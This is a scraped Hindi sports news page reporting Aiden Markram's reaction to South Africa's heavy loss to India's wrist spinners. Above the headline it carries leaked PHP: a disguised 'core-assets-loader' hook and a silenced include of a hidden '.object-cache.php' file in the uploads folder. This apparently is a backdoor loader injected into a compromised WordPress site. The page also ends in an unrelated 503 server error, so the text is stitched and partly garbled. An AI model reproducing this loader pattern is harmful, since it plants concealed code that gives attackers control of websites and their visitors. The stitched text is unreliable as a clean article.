add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); इस हार से निराश नहीं दक्षिण अफ्रीकी कप्तान एडन मार्कराम – SOCH INDIA
Menu

खेल
इस हार से निराश नहीं दक्षिण अफ्रीकी कप्तान एडन मार्कराम

nobanner

दक्षिण अफ्रीकी कप्तान फाफ डू प्लेसी की गैर-मौजूदगी में टीम की कमान संभाल रहे एडन मार्कराम इस हार निराश नहीं हैं. उन्होंने इसे सीख देने वाला बताया है साथ ही कहा कि उनकी टीम अह मुकाबले में वापसी करेगी.

कलाई के स्पिनर युजवेन्द्र चहल और कुलदीप यादव की फिरकी के आगे पूरी दक्षिण अफ्रीकी टीम नौसिखया नज़र आई और महज़ 118 रनों पर ढेर हो गई. दक्षिण अफ्रीकी टीम के इस प्रदर्शन की वजह से भारतीय टीम सीरीज़ 2-0 से आगे हो गई है.

कार्यवाहक कप्तान मार्कराम ने हार के बाद कहा,‘‘निश्चित तौर पर यह हमारे लिए आंखे खोलने वाला था. लेकिन शायद इससे टीम अपना सर्वश्रेष्ठ प्रदर्शन करे और हम मैच में कुछ चुनौती दे सके. मुझे यह देखना होगा की ऐसी स्थिति से खिलाड़ी कैसे निपटते है.’’

उन्होंने कहा,‘‘जाहिर है खिलाड़ी बहुत परेशान और निराश हैं लेकिन अच्छी बात यह है कि वे खुद से निराश है. यह हमारी खेल संस्कृति को दर्शाता है और यह काफी मजबूत है.’’

कप्तानी में पहले मैच में ही बुरी तरह पराजय झेलने वाले मार्कराम ने कहा,‘‘हर खिलाड़ी आगे बढ़ने को तैयार हैं. यह एक त्वरित बदलाव है लेकिन यह बाकी बचे चार मैचों में खिलाड़ियों में जोश भर सकता है जो हमारे लिए अच्छी बात हैं.

उन्होंने भारतीय स्पिनरों की तारीफ करते हुए कहा,‘‘चहल और कुलदीप अपने तरीके के शानदार गेंदबाज है. मुझे लगता है कि हमने उनका सामना ठीक से नहीं किया और आज हमारी गिरावट यहीं से शुरू हुई.’’

उन्होंने कहा, ‘‘अंतरराष्ट्रीय क्रिकेट में आपको कमजोर आक्रमण का सामना करने को नहीं मिलेगा और ना ही कमजोर बल्लेबाजी क्रम का. आज हमारा दिन खराब था. हमें स्पिन के खिलाफ अपनी बल्लेबाजी पर काम करना होगा लेकिन हमारे लिए यह बहुत बड़ा खतरा नहीं है.’’

मार्कराम ने कहा कि बल्लेबाजी में हमें तभी सफलता मिलेगी जब हम अपनी योजनाओं पर ठीक से काम करें.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.